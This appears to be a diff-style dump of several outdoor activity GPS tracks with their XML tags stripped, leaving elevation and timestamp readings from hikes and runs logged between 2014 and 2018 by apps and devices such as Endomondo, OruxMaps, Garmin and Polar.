+
+
+252.9
+
+
+252.9738568882665
+
+
+253.59999940853794
+ "
+"
+
+
+
+Eric Fuemm
+
+
+
+
+Endomondo
+2014-03-09T13:32:05Z
+
+http://www.endomondo.com/
+
+endomondo
+RUNNING
+
+
+2014-03-09T09:31:01Z
+
+
+400.0
+2014-03-09T09:31:46Z
+
+
+388.0
+2014-03-09T09:32:15Z
+
+
+380.0
+2014-03-09T09:33:08Z
+
+
+385.0
+2014-03-09T09:34:25Z
+
+
+388.0
+2014-03-09T09:34:51Z
+
+
+391.0
+2014-03-09T09:35:32Z
+
+
+407.0
+2014-03-09T09:36:31Z
+
+
+450.0
+2014-03-09T09:39:10Z
+
+
+472.0
+2014-03-09T09:40:55Z
+
+
+470.0
+2014-03-09T09:41:57Z
+
+
+439.0
+2014-03-09T09:43:05Z
+
+
+452.0
+2014-03-09T09:44:44Z
+
+
+454.0
+2014-03-09T09:45:09Z
+
+
+493.0
+2014-03-09T09:46:47Z
+
+
+485.0
+2014-03-09T09:48:15Z
+
+
+512.0
+2014-03-09T09:48:42Z
+
+
+487.0
+2014-03-09T09:51:14Z
+
+
+479.0
+2014-03-09T09:51:43Z
+
+
+461.0
+2014-03-09T09:54:52Z
+
+
+617.0
+2014-03-09T09:58:08Z
+
+
+603.0
+2014-03-09T10:01:47Z
+
+
+664.0
+2014-03-09T10:02:26Z
+
+
+661.0
+2014-03-09T10:03:49Z
+
+
+697.0
+2014-03-09T10:06:25Z
+
+
+694.0
+2014-03-09T10:08:40Z
+
+
+720.0
+2014-03-09T10:10:01Z
+
+
+743.0
+2014-03-09T10:11:00Z
+
+
+797.0
+2014-03-09T10:15:44Z
+
+
+834.0
+2014-03-09T10:18:14Z
+
+
+829.0
+2014-03-09T10:18:44Z
+
+
+835.0
+2014-03-09T10:19:09Z
+
+
+841.0
+2014-03-09T10:21:52Z
+
+
+902.0
+2014-03-09T10:25:19Z
+
+
+2014-03-09T10:26:33Z
+
+
+
+2014-03-09T10:40:19Z
+
+
+892.0
+2014-03-09T10:42:12Z
+
+
+849.0
+2014-03-09T10:45:42Z
+
+
+830.0
+2014-03-09T10:52:56Z
+
+
+837.0
+2014-03-09T10:53:58Z
+
+
+825.0
+2014-03-09T10:57:19Z
+
+
+808.0
+2014-03-09T10:58:18Z
+
+
+762.0
+2014-03-09T11:01:22Z
+
+
+767.0
+2014-03-09T11:02:19Z
+
+
+763.0
+2014-03-09T11:03:47Z
+
+
+733.0
+2014-03-09T11:05:45Z
+
+
+718.0
+2014-03-09T11:06:55Z
+
+
+698.0
+2014-03-09T11:08:41Z
+
+
+670.0
+2014-03-09T11:11:43Z
+
+
+629.0
+2014-03-09T11:14:17Z
+
+
+619.0
+2014-03-09T11:14:52Z
+
+
+594.0
+2014-03-09T11:16:47Z
+
+
+564.0
+2014-03-09T11:18:12Z
+
+
+555.0
+2014-03-09T11:20:02Z
+
+
+541.0
+2014-03-09T11:20:41Z
+
+
+527.0
+2014-03-09T11:21:43Z
+
+
+498.0
+2014-03-09T11:24:04Z
+
+
+479.0
+2014-03-09T11:25:20Z
+
+
+472.0
+2014-03-09T11:26:14Z
+
+
+467.0
+2014-03-09T11:26:50Z
+
+
+429.0
+2014-03-09T11:28:53Z
+
+
+419.0
+2014-03-09T11:33:08Z
+
+
+415.0
+2014-03-09T11:39:18Z
+
+
+391.0
+2014-03-09T11:41:34Z
+
+
+402.0
+2014-03-09T11:42:05Z
+
+
+407.0
+2014-03-09T11:43:56Z
+
+
+2014-03-09T11:45:17Z
+
+
+
+2014-03-09T11:45:18Z
+ "
+"
+
+
+mulhacen ab
+
+
+
+
+
+OruxMaps
+2015-10-02T11:20:05Z
+
+
+mulhacen ab
+<h1>OruxMaps</h1><br /><hr align=""center"" width=""480"" style=""height: 2px; width: 517px""/><h2>Name: mulhacen ab</h2><br /><p>Startzeit: 10/02/2015 13:20</p><p>Zielzeit: 10/02/2015 15:18</p><p>Strecke: 5km (01:58)</p><p>Bewegungszeit: 01:31</p><p>Ø-Geschwindigkeit: 2,5km/h</p><p>Netto-Geschwindigkeit: 3,3km/h</p><p>Max. Geschwindigkeit: 6km/h</p><p>Minimale Höhe: 2675m</p><p>Maximale Höhe: 3470m</p><p>Steig-Geschw.: 144,4m/h</p><p>Sink-Geschw.: -404,8m/h</p><p>Aufstieg: 2m</p><p>Abstieg: -690m</p><p>Steigzeit: 00:00</p><p>Sinkzeit: 01:42</p><hr align=""center"" width=""480"" style=""height: 2px; width: 517px""/>
+
+Unbestimmt
+
+
+
+
+
+3470.79
+2015-10-02T11:20:05Z
+
+
+3459.04
+2015-10-02T11:27:35Z
+
+
+3412.79
+2015-10-02T11:37:32Z
+
+
+3406.81
+2015-10-02T11:38:26Z
+
+
+3399.92
+2015-10-02T11:39:14Z
+
+
+3393.3
+2015-10-02T11:40:29Z
+
+
+3374.93
+2015-10-02T11:42:41Z
+
+
+3371.8
+2015-10-02T11:43:14Z
+
+
+3370.7
+2015-10-02T11:44:02Z
+
+
+3362.29
+2015-10-02T11:45:24Z
+
+
+3343.92
+2015-10-02T11:47:55Z
+
+
+3314.79
+2015-10-02T11:50:02Z
+
+
+3298.79
+2015-10-02T11:51:31Z
+
+
+3187.78
+2015-10-02T12:07:35Z
+
+
+3172.82
+2015-10-02T12:08:46Z
+
+
+3163.68
+2015-10-02T12:12:32Z
+
+
+3141.32
+2015-10-02T12:14:16Z
+
+
+3126.45
+2015-10-02T12:15:17Z
+
+
+3049.23
+2015-10-02T12:23:18Z
+
+
+3025.8
+2015-10-02T12:24:28Z
+
+
+2992.82
+2015-10-02T12:29:29Z
+
+
+2970.89
+2015-10-02T12:32:03Z
+
+
+2966.2
+2015-10-02T12:35:46Z
+
+
+2961.94
+2015-10-02T12:36:39Z
+
+
+2946.28
+2015-10-02T12:39:58Z
+
+
+2941.73
+2015-10-02T12:41:27Z
+
+
+2896.3
+2015-10-02T12:45:45Z
+
+
+2882.79
+2015-10-02T12:47:15Z
+
+
+2866.81
+2015-10-02T12:49:09Z
+
+
+2837.88
+2015-10-02T12:53:29Z
+
+
+2825.82
+2015-10-02T12:54:55Z
+
+
+2800.79
+2015-10-02T12:57:37Z
+
+
+2794.29
+2015-10-02T12:58:42Z
+
+
+2750.82
+2015-10-02T13:02:27Z
+
+
+2725.27
+2015-10-02T13:04:48Z
+
+
+2706.79
+2015-10-02T13:08:19Z
+
+
+2678.39
+2015-10-02T13:18:12Z
+ "
+"
+
+
+
+
+
+
+
+
+
+
+594.599975585938
+2015-06-02T05:10:56Z
+
+
+613.599975585938
+2015-06-02T05:13:34Z
+
+
+622.599975585938
+2015-06-02T05:14:47Z
+
+
+640.200012207031
+2015-06-02T05:16:30Z
+
+
+663.400024414062
+2015-06-02T05:18:51Z
+
+
+687.599975585938
+2015-06-02T05:20:54Z
+
+
+711.0
+2015-06-02T05:22:47Z
+
+
+722.400024414062
+2015-06-02T05:23:39Z
+
+
+728.0
+2015-06-02T05:24:12Z
+
+
+752.0
+2015-06-02T05:25:57Z
+
+
+752.599975585938
+2015-06-02T05:27:11Z
+
+
+766.799987792969
+2015-06-02T05:28:12Z
+
+
+808.200012207031
+2015-06-02T05:31:01Z
+
+
+813.200012207031
+2015-06-02T05:31:21Z
+
+
+856.799987792969
+2015-06-02T05:34:24Z
+
+
+911.599975585938
+2015-06-02T05:38:33Z
+
+
+933.200012207031
+2015-06-02T05:40:12Z
+
+
+958.200012207031
+2015-06-02T05:42:35Z
+
+
+976.799987792969
+2015-06-02T05:44:21Z
+
+
+997.0
+2015-06-02T05:46:21Z
+
+
+1008.59997558594
+2015-06-02T05:47:09Z
+
+
+1015.0
+2015-06-02T05:47:46Z
+
+
+1024.80004882812
+2015-06-02T05:48:27Z
+
+
+1040.80004882812
+2015-06-02T05:49:38Z
+
+
+1077.0
+2015-06-02T05:52:28Z
+
+
+1111.19995117188
+2015-06-02T05:55:15Z
+
+
+1151.0
+2015-06-02T05:58:41Z
+
+
+1165.59997558594
+2015-06-02T05:59:50Z
+
+
+1183.40002441406
+2015-06-02T06:01:17Z
+
+
+1203.0
+2015-06-02T06:03:27Z
+
+
+1220.80004882812
+2015-06-02T06:05:00Z
+
+
+1236.19995117188
+2015-06-02T06:07:10Z
+
+
+1250.59997558594
+2015-06-02T06:08:39Z
+
+
+1266.80004882812
+2015-06-02T06:09:53Z
+
+
+1276.0
+2015-06-02T06:11:19Z
+
+
+1284.80004882812
+2015-06-02T06:12:41Z
+
+
+1303.80004882812
+2015-06-02T06:14:51Z
+
+
+1320.0
+2015-06-02T06:16:06Z
+
+
+1331.40002441406
+2015-06-02T06:17:09Z
+
+
+1382.80004882812
+2015-06-02T06:21:29Z
+
+
+1413.19995117188
+2015-06-02T06:23:52Z
+
+
+1424.40002441406
+2015-06-02T06:24:54Z
+
+
+1442.0
+2015-06-02T06:27:02Z
+ "
+"
+
+
+
+
+
+
+Garmin International
+2017-08-27T04:26:24Z
+
+
+2017-08-25_Aufstieg_Biwak
+
+
+
+
+
+
+
+
+2061.68
+2017-08-25T11:45:20Z
+
+
+2048.71
+2017-08-25T11:48:38Z
+
+
+2058.32
+2017-08-25T11:51:32Z
+
+
+2094.85
+2017-08-25T11:56:44Z
+
+
+2106.39
+2017-08-25T11:58:04Z
+
+
+2134.26
+2017-08-25T12:03:46Z
+
+
+2141.47
+2017-08-25T12:05:08Z
+
+
+2147.72
+2017-08-25T12:07:28Z
+
+
+2149.16
+2017-08-25T12:07:49Z
+
+
+2156.86
+2017-08-25T12:08:56Z
+
+
+2153.01
+2017-08-25T12:09:45Z
+
+
+2152.53
+2017-08-25T12:10:06Z
+
+
+2152.05
+2017-08-25T12:11:50Z
+
+
+2156.86
+2017-08-25T12:24:08Z
+
+
+2154.45
+2017-08-25T12:24:45Z
+
+
+2153.97
+2017-08-25T12:26:53Z
+
+
+2156.37
+2017-08-25T12:28:00Z
+
+
+2158.78
+2017-08-25T12:28:40Z
+
+
+2169.83
+2017-08-25T12:32:10Z
+
+
+2187.14
+2017-08-25T12:35:03Z
+
+
+2195.79
+2017-08-25T12:37:07Z
+
+
+2211.17
+2017-08-25T12:39:59Z
+
+
+2219.82
+2017-08-25T12:41:23Z
+
+
+2224.15
+2017-08-25T12:42:44Z
+
+
+2239.53
+2017-08-25T12:46:44Z
+
+
+2287.11
+2017-08-25T12:54:36Z
+
+
+2295.77
+2017-08-25T12:55:44Z
+
+
+2315.95
+2017-08-25T13:01:12Z
+
+
+2337.58
+2017-08-25T13:06:00Z
+
+
+2373.15
+2017-08-25T13:11:25Z
+
+
+2402.95
+2017-08-25T13:16:58Z
+
+
+2424.58
+2017-08-25T13:21:08Z
+
+
+2453.42
+2017-08-25T13:26:02Z
+
+
+2464.96
+2017-08-25T13:28:18Z
+
+
+2486.59
+2017-08-25T13:32:48Z
+
+
+2504.37
+2017-08-25T13:36:08Z
+
+
+2530.33
+2017-08-25T13:40:24Z
+
+
+2549.07
+2017-08-25T13:46:52Z
+
+
+2551.0
+2017-08-25T13:48:23Z
+
+
+2553.88
+2017-08-25T13:50:09Z
+
+
+2555.8
+2017-08-25T13:51:02Z
+
+
+2551.48
+2017-08-25T13:53:58Z
+ "
+"
+
+
+
+
+
+
+Garmin International
+2016-11-10T18:15:44Z
+
+
+Traccia corrente: 10 NOV 2016 09:04
+
+
+
+
+
+
+362.55
+2016-11-10T08:04:09Z
+
+
+397.64
+2016-11-10T08:11:39Z
+
+
+401.01
+2016-11-10T08:14:09Z
+
+
+426.96
+2016-11-10T08:28:09Z
+
+
+470.22
+2016-11-10T08:40:39Z
+
+
+488.01
+2016-11-10T08:50:08Z
+
+
+499.54
+2016-11-10T08:56:08Z
+
+
+499.54
+2016-11-10T09:01:08Z
+
+
+514.44
+2016-11-10T09:09:08Z
+
+
+525.02
+2016-11-10T09:13:08Z
+
+
+537.03
+2016-11-10T09:19:08Z
+
+
+541.36
+2016-11-10T09:24:38Z
+
+
+543.28
+2016-11-10T09:29:38Z
+
+
+543.28
+2016-11-10T09:31:08Z
+
+
+542.8
+2016-11-10T09:32:38Z
+
+
+569.72
+2016-11-10T09:56:08Z
+
+
+571.16
+2016-11-10T09:57:38Z
+
+
+572.12
+2016-11-10T09:58:07Z
+
+
+574.04
+2016-11-10T09:59:07Z
+
+
+571.16
+2016-11-10T10:06:48Z
+
+
+569.72
+2016-11-10T10:08:48Z
+
+
+561.55
+2016-11-10T10:21:18Z
+
+
+537.99
+2016-11-10T10:59:18Z
+
+
+517.81
+2016-11-10T11:18:18Z
+
+
+534.63
+2016-11-10T11:32:18Z
+
+
+464.93
+2016-11-10T12:51:48Z
+
+
+448.11
+2016-11-10T13:02:18Z
+
+
+426.48
+2016-11-10T13:07:48Z
+
+
+419.27
+2016-11-10T13:10:48Z
+
+
+412.54
+2016-11-10T13:13:18Z
+
+
+391.87
+2016-11-10T13:17:48Z
+
+
+390.91
+2016-11-10T13:20:48Z
+
+
+390.43
+2016-11-10T13:22:48Z
+
+
+377.94
+2016-11-10T13:25:54Z
+ "
+"
+
+
+
+
+
+
+Garmin Connect
+2016-04-21T13:39:24Z
+
+Borgio Wandern
+Zustieg zum Klettergarten Rocce dell'Orera
+
+
+
+255.39999389648438
+2016-04-21T13:39:24Z
+
+
+
+
+
+247.60000610351562
+2016-04-21T13:40:56Z
+
+
+
+
+
+244.39999389648438
+2016-04-21T13:42:29Z
+
+
+
+
+
+234.1999969482422
+2016-04-21T13:43:13Z
+
+
+
+
+
+223.60000610351562
+2016-04-21T13:44:12Z
+
+
+
+
+
+203.60000610351562
+2016-04-21T13:45:51Z
+
+
+
+
+
+184.39999389648438
+2016-04-21T13:47:23Z
+
+
+
+
+
+124.19999694824219
+2016-04-21T13:52:03Z
+
+
+
+
+
+103.80000305175781
+2016-04-21T13:53:27Z
+
+
+
+
+
+88.19999694824219
+2016-04-21T13:54:47Z
+
+
+
+
+
+69.80000305175781
+2016-04-21T13:56:11Z
+
+
+
+
+
+60.0
+2016-04-21T13:57:26Z
+
+
+
+
+
+46.400001525878906
+2016-04-21T13:59:03Z
+
+
+
+
+
+30.200000762939453
+2016-04-21T14:00:16Z
+
+
+
+
+
+15.0
+2016-04-21T14:01:28Z
+
+
+
+
+
+12.399999618530273
+2016-04-21T14:02:34Z
+
+
+
+
+
+13.0
+2016-04-21T14:03:10Z
+
+
+
+
+
+11.600000381469727
+2016-04-21T14:06:25Z
+
+
+
+
+
+12.0
+2016-04-21T14:07:13Z
+
+
+
+
+
+11.0
+2016-04-21T14:08:53Z
+
+
+
+
+
+11.800000190734863
+2016-04-21T14:09:10Z
+
+
+
+
+
+12.0
+2016-04-21T14:09:47Z
+
+
+
+
+
+12.0
+2016-04-21T14:12:57Z
+
+
+
+
+
+12.399999618530273
+2016-04-21T14:13:09Z
+
+
+
+
+
+15.199999809265137
+2016-04-21T14:21:14Z
+
+
+
+ "
+"
+
+
+
+
+
+
+Garmin International
+2014-09-23T18:24:59Z
+
+2014-09-23 20:24:57
+
+
+
+
+
+
+920.22
+2014-09-23T15:04:50Z
+
+
+921.46
+2014-09-23T15:06:01Z
+
+
+933.7
+2014-09-23T15:07:16Z
+
+
+950.17
+2014-09-23T15:08:28Z
+
+
+975.22
+2014-09-23T15:10:14Z
+
+
+990.89
+2014-09-23T15:11:24Z
+
+
+1008.68
+2014-09-23T15:12:52Z
+
+
+1014.12
+2014-09-23T15:13:23Z
+
+
+1023.26
+2014-09-23T15:14:07Z
+
+
+1040.17
+2014-09-23T15:15:29Z
+
+
+1048.75
+2014-09-23T15:16:13Z
+
+
+1054.14
+2014-09-23T15:16:41Z
+
+
+1060.6
+2014-09-23T15:17:17Z
+
+
+1066.9
+2014-09-23T15:17:50Z
+
+
+1075.2
+2014-09-23T15:18:31Z
+
+
+1085.53
+2014-09-23T15:19:49Z
+
+
+1096.06
+2014-09-23T15:20:36Z
+
+
+1147.85
+2014-09-23T15:24:45Z
+
+
+1153.78
+2014-09-23T15:25:24Z
+
+
+1158.03
+2014-09-23T15:25:54Z
+
+
+1174.23
+2014-09-23T15:27:29Z
+
+
+1189.02
+2014-09-23T15:28:39Z
+
+
+1200.86
+2014-09-23T15:29:32Z
+
+
+1213.54
+2014-09-23T15:30:25Z
+
+
+1236.61
+2014-09-23T15:32:43Z
+
+
+1248.32
+2014-09-23T15:33:45Z
+
+
+1277.41
+2014-09-23T15:36:24Z
+
+
+1290.38
+2014-09-23T15:37:58Z
+
+
+1309.03
+2014-09-23T15:40:54Z
+
+
+1310.12
+2014-09-23T15:43:50Z
+
+
+1331.79
+2014-09-23T15:46:27Z
+
+
+1333.7
+2014-09-23T15:56:47Z
+
+
+1374.24
+2014-09-23T16:18:47Z
+
+
+1483.12
+2014-09-23T17:11:54Z
+
+
+1509.89
+2014-09-23T17:31:59Z
+
+
+1481.23
+2014-09-23T17:35:06Z
+
+
+1457.53
+2014-09-23T17:37:40Z
+
+
+1451.17
+2014-09-23T17:38:00Z
+
+
+1387.93
+2014-09-23T17:44:00Z
+
+
+1347.68
+2014-09-23T17:47:59Z
+
+
+1314.09
+2014-09-23T17:50:25Z
+
+
+1299.99
+2014-09-23T17:51:31Z
+
+
+1275.12
+2014-09-23T17:53:17Z
+
+
+1268.78
+2014-09-23T17:54:10Z
+
+
+1242.94
+2014-09-23T17:58:18Z
+
+
+1221.89
+2014-09-23T18:00:00Z
+
+
+1193.5
+2014-09-23T18:02:26Z
+
+
+1169.27
+2014-09-23T18:05:40Z
+
+
+1156.62
+2014-09-23T18:07:20Z
+
+
+1148.09
+2014-09-23T18:08:11Z
+
+
+1135.5
+2014-09-23T18:08:52Z
+
+
+1096.6
+2014-09-23T18:11:07Z
+
+
+1084.51
+2014-09-23T18:12:00Z
+
+
+1081.24
+2014-09-23T18:12:23Z
+
+
+1081.06
+2014-09-23T18:13:04Z
+
+
+1080.97
+2014-09-23T18:13:31Z
+
+
+1060.38
+2014-09-23T18:14:50Z
+
+
+1055.49
+2014-09-23T18:15:05Z
+
+
+1047.29
+2014-09-23T18:15:30Z
+
+
+1027.13
+2014-09-23T18:16:23Z
+
+
+1021.29
+2014-09-23T18:16:42Z
+
+
+1014.85
+2014-09-23T18:16:58Z
+
+
+988.98
+2014-09-23T18:19:20Z
+
+
+962.96
+2014-09-23T18:21:41Z
+
+
+944.3
+2014-09-23T18:22:54Z
+
+
+924.57
+2014-09-23T18:24:09Z
+
+
+922.09
+2014-09-23T18:24:45Z
+ "
+"
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ "
+"
+
+
+
+
+
+
+Garmin International
+2017-04-30T09:12:06Z
+
+30-APR-17 11:12:02
+
+
+
+
+
+439.94
+2017-04-30T07:30:51Z
+
+
+448.11
+2017-04-30T07:32:58Z
+
+
+447.15
+2017-04-30T07:36:03Z
+
+
+448.11
+2017-04-30T07:37:32Z
+
+
+448.59
+2017-04-30T07:38:52Z
+
+
+448.59
+2017-04-30T07:41:36Z
+
+
+449.07
+2017-04-30T07:42:58Z
+
+
+449.55
+2017-04-30T07:44:11Z
+
+
+452.44
+2017-04-30T07:47:05Z
+
+
+456.28
+2017-04-30T07:48:47Z
+
+
+458.69
+2017-04-30T07:50:49Z
+
+
+461.57
+2017-04-30T07:52:20Z
+
+
+465.9
+2017-04-30T07:54:39Z
+
+
+486.56
+2017-04-30T07:57:34Z
+
+
+494.26
+2017-04-30T07:59:40Z
+
+
+499.06
+2017-04-30T08:01:23Z
+
+
+500.5
+2017-04-30T08:03:11Z
+
+
+509.16
+2017-04-30T08:05:37Z
+
+
+510.12
+2017-04-30T08:08:47Z
+
+
+515.88
+2017-04-30T08:11:40Z
+
+
+510.12
+2017-04-30T08:14:01Z
+
+
+509.16
+2017-04-30T08:15:18Z
+
+
+503.39
+2017-04-30T08:16:31Z
+
+
+503.87
+2017-04-30T08:19:36Z
+
+
+508.67
+2017-04-30T08:22:07Z
+
+
+508.19
+2017-04-30T08:23:31Z
+
+
+502.43
+2017-04-30T08:24:56Z
+
+
+500.98
+2017-04-30T08:26:25Z
+
+
+521.65
+2017-04-30T08:34:30Z
+
+
+547.61
+2017-04-30T08:40:58Z
+
+
+542.8
+2017-04-30T08:42:08Z
+
+
+537.03
+2017-04-30T08:50:12Z
+
+
+536.55
+2017-04-30T08:54:33Z
+
+
+537.51
+2017-04-30T08:57:48Z
+
+
+541.84
+2017-04-30T09:01:18Z
+
+
+550.49
+2017-04-30T09:04:39Z
+
+
+550.49
+2017-04-30T09:10:51Z
+ "
+"
+
+
+GPSies Track
+
+
+
+
+GPSies Track on GPSies.com
+2018-01-14T13:42:30Z
+
+GPSies Track on GPSies.com
+
+
+
+1020.0
+2010-01-01T00:00:00Z
+
+
+1042.0
+2010-01-01T00:00:29Z
+
+
+1075.0
+2010-01-01T00:01:12Z
+
+
+1091.0
+2010-01-01T00:01:33Z
+
+
+1107.0
+2010-01-01T00:02:09Z
+
+
+1231.0
+2010-01-01T00:03:58Z
+
+
+1246.0
+2010-01-01T00:04:23Z
+
+
+1321.0
+2010-01-01T00:05:45Z
+
+
+1387.0
+2010-01-01T00:07:11Z
+
+
+1377.0
+2010-01-01T00:08:20Z
+
+
+1380.0
+2010-01-01T00:09:03Z
+
+
+1402.0
+2010-01-01T00:10:30Z
+
+
+1398.0
+2010-01-01T00:10:58Z
+
+
+1393.0
+2010-01-01T00:11:36Z
+
+
+1411.0
+2010-01-01T00:12:06Z
+
+
+1443.0
+2010-01-01T00:12:41Z
+
+
+1477.0
+2010-01-01T00:13:14Z
+
+
+1494.0
+2010-01-01T00:13:36Z
+
+
+1540.0
+2010-01-01T00:14:31Z
+
+
+1573.0
+2010-01-01T00:15:16Z
+
+
+1590.0
+2010-01-01T00:16:08Z
+
+
+1614.0
+2010-01-01T00:16:41Z
+
+
+1644.0
+2010-01-01T00:17:16Z
+
+
+1728.0
+2010-01-01T00:18:09Z
+
+
+1743.0
+2010-01-01T00:18:31Z
+
+
+1754.0
+2010-01-01T00:19:06Z
+
+
+1800.0
+2010-01-01T00:20:13Z
+
+
+1807.0
+2010-01-01T00:20:31Z
+
+
+1845.0
+2010-01-01T00:21:11Z
+
+
+1843.0
+2010-01-01T00:21:31Z
+
+
+1874.0
+2010-01-01T00:22:04Z
+
+
+1929.0
+2010-01-01T00:23:13Z
+
+
+1959.0
+2010-01-01T00:23:35Z
+
+
+2043.0
+2010-01-01T00:25:09Z
+
+
+2044.0
+2010-01-01T00:25:30Z
+ "
+"
+
+
+
+Polar
+
+
+
+2016-07-08T10:01:34Z
+
+
+
+
+1320.0
+2016-07-08T10:01:35Z
+
+
+1320.0
+2016-07-08T10:02:00Z
+
+
+1348.0
+2016-07-08T10:02:28Z
+
+
+1331.0
+2016-07-08T10:04:08Z
+
+
+1331.0
+2016-07-08T10:04:37Z
+
+
+1335.0
+2016-07-08T10:05:28Z
+
+
+1338.0
+2016-07-08T10:06:20Z
+
+
+1339.0
+2016-07-08T10:06:51Z
+
+
+1347.0
+2016-07-08T10:12:50Z
+
+
+1354.0
+2016-07-08T10:13:41Z
+
+
+1359.0
+2016-07-08T10:14:22Z
+
+
+1365.0
+2016-07-08T10:15:20Z
+
+
+1383.0
+2016-07-08T10:17:19Z
+
+
+1419.0
+2016-07-08T10:20:37Z
+
+
+1486.0
+2016-07-08T10:26:24Z
+
+
+1516.0
+2016-07-08T10:29:47Z
+
+
+1544.0
+2016-07-08T10:32:31Z
+
+
+1556.0
+2016-07-08T10:33:32Z
+
+
+1584.0
+2016-07-08T10:37:00Z
+
+
+1599.0
+2016-07-08T10:40:38Z
+
+
+1626.0
+2016-07-08T10:43:00Z
+
+
+1645.0
+2016-07-08T10:44:55Z
+
+
+1654.0
+2016-07-08T10:45:58Z
+
+
+1687.0
+2016-07-08T10:49:47Z
+
+
+1725.0
+2016-07-08T10:54:11Z
+
+
+1750.0
+2016-07-08T10:58:54Z
+
+
+1761.0
+2016-07-08T10:59:37Z
+
+
+1831.0
+2016-07-08T11:10:29Z
+
+
+1851.0
+2016-07-08T11:13:05Z
+
+
+1875.0
+2016-07-08T11:15:40Z
+
+
+1915.0
+2016-07-08T11:20:08Z
+
+
+1927.0
+2016-07-08T11:21:25Z
+
+
+1967.0
+2016-07-08T11:24:58Z
+
+
+2011.0
+2016-07-08T11:31:34Z
+
+
+2061.0
+2016-07-08T11:36:28Z
+
+
+2082.0
+2016-07-08T11:38:40Z
+
+
+2119.0
+2016-07-08T11:42:26Z
+
+
+2134.0
+2016-07-08T11:45:08Z
+
+
+2161.0
+2016-07-08T11:49:02Z
+
+
+2178.0
+2016-07-08T11:51:51Z
+
+
+2187.0
+2016-07-08T11:54:11Z
+
+
+2218.0
+2016-07-08T11:57:26Z
+
+
+2249.0
+2016-07-08T12:01:49Z
+
+
+2272.0
+2016-07-08T12:06:38Z
+
+
+2293.0
+2016-07-08T12:09:13Z
+
+
+2313.0
+2016-07-08T12:11:03Z
+
+
+2331.0
+2016-07-08T12:14:07Z
+
+
+2338.0
+2016-07-08T12:15:27Z
+
+
+2353.0
+2016-07-08T12:17:09Z
+
+
+2371.0
+2016-07-08T12:19:55Z
+
+
+2409.0
+2016-07-08T12:24:01Z
+
+
+2398.0
+2016-07-08T12:26:46Z
+
+
+2395.0
+2016-07-08T12:28:32Z
+
+
+2408.0
+2016-07-08T12:30:04Z
+
+
+2418.0
+2016-07-08T12:31:22Z
+
+
+2429.0
+2016-07-08T12:32:30Z
+
+
+2410.0
+2016-07-08T12:40:32Z
+
+
+2403.0
+2016-07-08T12:43:08Z
+
+
+2463.0
+2016-07-08T12:48:34Z
+ "
+"
+
+
+
+
+
+
+Garmin International
+2015-08-16T11:27:37Z
+
+
+PASSO DI POZZERA(VETTA QUOTA 2206)e
+
+
+
+
+
+
+1288.3
+2015-08-11T06:00:44Z
+
+
+1307.05
+2015-08-11T06:05:58Z
+
+
+1322.43
+2015-08-11T06:09:33Z
+
+
+1339.73
+2015-08-11T06:12:32Z
+
+
+1369.05
+2015-08-11T06:16:16Z
+
+
+1388.28
+2015-08-11T06:18:14Z
+
+
+1400.3
+2015-08-11T06:19:29Z
+
+
+1427.21
+2015-08-11T06:22:26Z
+
+
+1454.13
+2015-08-11T06:26:41Z
+
+
+1456.53
+2015-08-11T06:27:47Z
+
+
+1457.02
+2015-08-11T06:29:58Z
+
+
+1467.59
+2015-08-11T06:32:02Z
+
+
+1475.76
+2015-08-11T06:35:14Z
+
+
+1489.7
+2015-08-11T06:39:32Z
+
+
+1504.12
+2015-08-11T06:42:22Z
+
+
+1528.63
+2015-08-11T06:45:24Z
+
+
+1552.19
+2015-08-11T06:47:48Z
+
+
+1567.57
+2015-08-11T06:53:04Z
+
+
+1581.03
+2015-08-11T06:54:41Z
+
+
+1602.66
+2015-08-11T06:59:11Z
+
+
+1637.74
+2015-08-11T07:02:21Z
+
+
+1675.72
+2015-08-11T07:07:52Z
+
+
+1798.76
+2015-08-11T07:23:36Z
+
+
+1807.42
+2015-08-11T07:24:17Z
+
+
+1842.98
+2015-08-11T07:30:18Z
+
+
+1855.96
+2015-08-11T07:32:13Z
+
+
+1889.61
+2015-08-11T07:36:03Z
+
+
+1910.28
+2015-08-11T07:39:51Z
+
+
+1917.97
+2015-08-11T07:40:20Z
+
+
+1957.86
+2015-08-11T07:45:14Z
+
+
+1991.99
+2015-08-11T07:49:44Z
+
+
+2010.73
+2015-08-11T07:53:10Z
+
+
+2027.56
+2015-08-11T07:56:45Z
+
+
+2065.05
+2015-08-11T08:07:33Z
+
+
+2072.74
+2015-08-11T08:09:11Z
+
+
+2079.95
+2015-08-11T08:10:26Z
+
+
+2100.14
+2015-08-11T08:14:34Z
+
+
+2120.81
+2015-08-11T08:18:57Z
+
+
+2132.82
+2015-08-11T08:22:49Z
+
+
+2140.99
+2015-08-11T08:24:51Z
+
+
+2158.78
+2015-08-11T08:30:20Z
+
+
+2192.42
+2015-08-11T08:33:49Z
+
+
+2227.99
+2015-08-11T08:39:43Z
+
+
+2227.03
+2015-08-11T08:41:44Z
+
+
+2227.99
+2015-08-11T08:43:39Z
+
+
+2231.36
+2015-08-11T08:48:57Z
+
+
+2218.38
+2015-08-11T08:53:55Z
+
+
+2212.13
+2015-08-11T08:54:35Z
+
+
+2182.81
+2015-08-11T08:59:08Z
+
+
+2169.35
+2015-08-11T09:01:35Z
+
+
+2170.79
+2015-08-11T09:03:49Z
+
+
+2156.37
+2015-08-11T09:07:23Z
+
+
+2154.93
+2015-08-11T09:08:54Z
+
+
+2151.57
+2015-08-11T09:10:07Z
+
+
+2146.76
+2015-08-11T09:16:47Z
+
+
+2186.18
+2015-08-11T09:22:32Z
+
+
+2204.92
+2015-08-11T09:28:40Z
+ "
+"
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ "
+"
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ "
+"
+
+
+Tourenplanung am 7. November 2016
+
+TemporaryUserGroup
+
+
+
+2016-11-07T19:59:03Z
+
+Tourenplanung am 7. November 2016
+
+
+
